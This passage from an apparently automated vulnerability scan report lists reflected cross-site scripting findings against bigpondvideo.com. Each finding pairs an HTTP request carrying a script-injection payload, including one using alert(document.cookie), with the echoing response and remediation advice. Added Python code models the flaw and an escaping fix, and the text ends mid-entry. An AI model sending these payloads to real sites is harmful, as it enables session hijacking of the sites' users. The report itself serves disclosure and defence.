The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f688</script><script>alert(1)</script>c21790034fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Two points follow from the response below: the FlashVars string contains the entire query string, parameter names included, so any fix has to cover the raw query string rather than individual known parameters; and escaping quotes for the JavaScript string literal is not sufficient on its own, because the browser's HTML tokenizer ends the script element at the first </script> sequence before the JavaScript parser ever sees the string. Characters that matter to the HTML parser (< and >) as well as the enclosing quote must be hex-escaped (\u003c, \u003e, \u0027), or the data moved out of the script block altogether, for example into an HTML-encoded data attribute read at runtime.

Request

GET /NRL/?1f688</script><script>alert(1)</script>c21790034fb=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:41 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303a1e2df&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&1f688</script><script>alert(1)</script>c21790034fb=1&navId=490&channelTitle=NRL&targetLevel=Videos.Sport.NRL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.459. http://bigpondvideo.com/NRL/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NRL/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a0db</script><script>alert(1)</script>885f6c100d8 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NRL/?ref=Net-Head-TV-NRL1a0db</script><script>alert(1)</script>885f6c100d8 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:29 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
om/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302d8cc44&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-NRL1a0db</script><script>alert(1)</script>885f6c100d8&navId=490&channelTitle=NRL&targetLevel=Videos.Sport.NRL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.460. http://bigpondvideo.com/NewsOnDemand/ [c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemand/

Issue detail

The value of the c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 request parameter is copied into the HTML document as plain text between tags. The payload a2e63<script>alert(1)</script>7eab4e8c706 was submitted in the c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 parameter. This input was echoed unmodified in the application's response. The parameter name is the 2.461 payload with alert(1) changed to alert(document.cookie), URL-encoded in the request and decoded by the application before being echoed: the name is written into the FlashVars string first and its </script> ends the script element, so the value that follows it is rendered as ordinary HTML text, where a bare <script> tag executes. The same injection point therefore yields a JavaScript-string context or an HTML-text context depending on what precedes it in the query string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NewsOnDemand/?c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289=1a2e63<script>alert(1)</script>7eab4e8c706 HTTP/1.1
Host: bigpondvideo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sv_sid=453774846568; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; s_cc=true; s_nr=1290483861171; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; gpv_p49=BigPond%20TV; gpv_e44=BigPond%20TV; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:06:54 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
</script>522ee782289=1a2e63<script>alert(1)</script>7eab4e8c706&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...
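
The two reflection contexts seen in 2.458 (the parameter name lands inside the single-quoted FlashVars string) and 2.460 (a </script> in the parameter name closes the script element first, so the value lands in HTML text) can be reproduced and checked offline. The Python below is an added example, not code from the XSS.CX report or from bigpondvideo.com: the page template is a constructed stand-in shaped like the response snippets, render_vulnerable simply concatenates the already-decoded query string the way the responses suggest, render_hardened and js_string_escape are one assumed fix, and script_regions and reflection_contexts are a simplified model of the HTML tokenizer used to classify where a marker ends up. The session id value and the payload strings are copied from the report.

```python
"""Added example (not code from the XSS.CX report or from the target site).

Models the reflection pattern of findings 2.458 and 2.460: the query string is
concatenated into a single-quoted JavaScript string inside <script>, so a
parameter name or value containing </script> ends the script element before
the JavaScript parser ever sees the string literal.
"""
import json
import re

# Shape taken from the report's response snippets; the builder itself is a
# constructed stand-in for whatever the PHP on the target does.
TEMPLATE = (
    '<html><head>\n<script type="text/javascript">\n'
    "AC_FL_RunContent('wmode','transparent',\n"
    "  'FlashVars','{flashvars}'+\"&screenW=\"+screen.width); //end AC code\n"
    "</script>\n</head><body><p>page body</p></body></html>\n"
)


def render_vulnerable(query_string, session_id="9b7c6ddb0174e371d6c21a37721a97ca"):
    """Raw (already URL-decoded) query string goes straight into the JS literal."""
    flashvars = "platform=Production&phpSessionId=%s&%s&navId=490" % (session_id, query_string)
    return TEMPLATE.format(flashvars=flashvars)


def js_string_escape(text):
    """Escape text for use inside a quoted JS string literal that lives in <script>.

    json.dumps handles backslash, double quote, control characters and the
    U+2028/U+2029 line terminators (ensure_ascii). The extra replacements close
    the gap JSON leaves: the HTML tokenizer sees </script> before the JS parser
    runs, and this page delimits the literal with single quotes, which JSON
    does not escape.
    """
    out = json.dumps(text)[1:-1]  # strip JSON's surrounding double quotes
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("'", "\\u0027")):
        out = out.replace(ch, esc)
    return out


def render_hardened(query_string, session_id="9b7c6ddb0174e371d6c21a37721a97ca"):
    """Same page, with the untrusted part escaped before concatenation.

    The session id still ends up in the page, as in the report; keeping it out
    of FlashVars altogether is the better design but is not modelled here.
    """
    flashvars = "platform=Production&phpSessionId=%s&%s&navId=490" % (
        session_id, js_string_escape(query_string))
    return TEMPLATE.format(flashvars=flashvars)


SCRIPT_TAG = re.compile(r"<script\b[^>]*>|</script\s*>", re.I)


def script_regions(body):
    """[(start, end)] spans that the HTML tokenizer treats as script data.

    Simplified model: only </script> ends script data, a <script> tag inside
    script data does not nest, and the <!-- "double escaped" states are ignored.
    """
    regions, open_at = [], None
    for m in SCRIPT_TAG.finditer(body):
        if not m.group(0).startswith("</"):
            if open_at is None:
                open_at = m.end()
        elif open_at is not None:
            regions.append((open_at, m.start()))
            open_at = None
    if open_at is not None:
        regions.append((open_at, len(body)))
    return regions


def reflection_contexts(body, marker):
    """For each unencoded copy of marker: does it sit in 'script' data or 'html' text?"""
    regions = script_regions(body)
    return [
        (m.start(), "script" if any(a <= m.start() < b for a, b in regions) else "html")
        for m in re.finditer(re.escape(marker), body)
    ]


# Payloads copied from findings 2.458 and 2.460 (URL-decoded, as the server echoes them).
PAYLOAD_2_458 = "1f688</script><script>alert(1)</script>c21790034fb=1"
PAYLOAD_2_460 = ("c014e</script><script>alert(document.cookie)</script>522ee782289"
                 "=1a2e63<script>alert(1)</script>7eab4e8c706")

if __name__ == "__main__":
    for label, q in (("2.458", PAYLOAD_2_458), ("2.460", PAYLOAD_2_460)):
        body = render_vulnerable(q)
        print(label, "script elements:", len(script_regions(body)),
              "| alert(1) lands in", reflection_contexts(body, "alert(1)")[0][1], "context")
    print("hardened 2.460 script elements:", len(script_regions(render_hardened(PAYLOAD_2_460))))
```

With the vulnerable builder the 2.458 payload turns one script element into two and the 2.460 payload into three, and the classifier reports the canary prefix (1f688, c014e) in script context but the trailing part (c21790034fb, a2e63) in HTML text, which is exactly the split between the "JavaScript string" and "plain text between tags" descriptions in the report. With the hardened builder the page keeps a single script element and no literal < survives in the FlashVars string, while a single quote in the input is turned into \u0027 so it cannot end the literal either. The tokenizer model is deliberately small; it does not handle the <!-- double-escaped script states or CDATA, so treat it as a regression check for this pattern, not a general HTML parser.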

2.461. http://bigpondvideo.com/NewsOnDemand/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemand/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c014e</script><script>alert(1)</script>522ee782289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. This response also issues the session cookie without the HttpOnly flag (Set-Cookie: PHPSESSID=...; path=/) and embeds the same session id in the FlashVars string, so script injected here can read the session identifier from document.cookie or from the page itself; set HttpOnly on the cookie and keep the session id out of page content.

Request

GET /NewsOnDemand/?c014e</script><script>alert(1)</script>522ee782289=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:50 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; path=/
Content-Type: text/html
Connection: close
Content-Length: 58287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b9290c30&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&c014e</script><script>alert(1)</script>522ee782289=1&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.462. http://bigpondvideo.com/NewsOnDemand/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemand/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfc57</script><script>alert(1)</script>694f5b478ee was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemand/?ref=Net-Head-TV-Newsbfc57</script><script>alert(1)</script>694f5b478ee HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:07:46 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
m/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3002d8ed6&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Newsbfc57</script><script>alert(1)</script>694f5b478ee&navId=574&channelTitle=News&targetLevel=Videos.News.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.463. http://bigpondvideo.com/NewsOnDemandEntertainment/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandEntertainment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb827</script><script>alert(1)</script>46fb0153270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandEntertainment/?fb827</script><script>alert(1)</script>46fb0153270=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:54 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=942c5f5c8f5b3da1d6e3cdfed6f0acc9; path=/
Content-Type: text/html
Connection: close
Content-Length: 58342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b96205e9&platform=Production&phpSessionId=942c5f5c8f5b3da1d6e3cdfed6f0acc9&fb827</script><script>alert(1)</script>46fb0153270=1&navId=704&channelTitle=Entertainment&targetLevel=Videos.News.Entertainment&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.464. http://bigpondvideo.com/NewsOnDemandEntertainment/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandEntertainment/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57d3</script><script>alert(1)</script>b9c0124a6dd was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandEntertainment/?ref=Net-Head-TV-Ente57d3</script><script>alert(1)</script>b9c0124a6dd HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:02 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
om/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3012e09b4&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Ente57d3</script><script>alert(1)</script>b9c0124a6dd&navId=704&channelTitle=Entertainment&targetLevel=Videos.News.Entertainment&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.465. http://bigpondvideo.com/NewsOnDemandFinance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandFinance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e938b</script><script>alert(1)</script>5e101fe150b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandFinance/?e938b</script><script>alert(1)</script>5e101fe150b=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ba03828817ea1b532ee5cc4ecc43bc65; path=/
Content-Type: text/html
Connection: close
Content-Length: 58312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b957a987&platform=Production&phpSessionId=ba03828817ea1b532ee5cc4ecc43bc65&e938b</script><script>alert(1)</script>5e101fe150b=1&navId=715&channelTitle=Finance&targetLevel=Videos.News.Finance&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.466. http://bigpondvideo.com/NewsOnDemandFinance/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandFinance/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf7c</script><script>alert(1)</script>283b9928e99 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandFinance/?ref=Net-Head-TV-Financeadf7c</script><script>alert(1)</script>283b9928e99 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:02 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
o/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30125b173&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Financeadf7c</script><script>alert(1)</script>283b9928e99&navId=715&channelTitle=Finance&targetLevel=Videos.News.Finance&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.467. http://bigpondvideo.com/NewsOnDemandNational/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandNational/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10f9a</script><script>alert(1)</script>9beb4d90696 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandNational/?10f9a</script><script>alert(1)</script>9beb4d90696=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d0e2a66649427d16f425d25b6d51f124; path=/
Content-Type: text/html
Connection: close
Content-Length: 58317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b957253d&platform=Production&phpSessionId=d0e2a66649427d16f425d25b6d51f124&10f9a</script><script>alert(1)</script>9beb4d90696=1&navId=703&channelTitle=National&targetLevel=Videos.News.National&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.468. http://bigpondvideo.com/NewsOnDemandNational/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandNational/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c5b</script><script>alert(1)</script>baea64c11b3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandNational/?ref=Net-Head-TV-Natlf1c5b</script><script>alert(1)</script>baea64c11b3 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:07:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
m/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb300907234&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Natlf1c5b</script><script>alert(1)</script>baea64c11b3&navId=703&channelTitle=National&targetLevel=Videos.News.National&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.469. http://bigpondvideo.com/NewsOnDemandOddspot/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandOddspot/

Issue detail

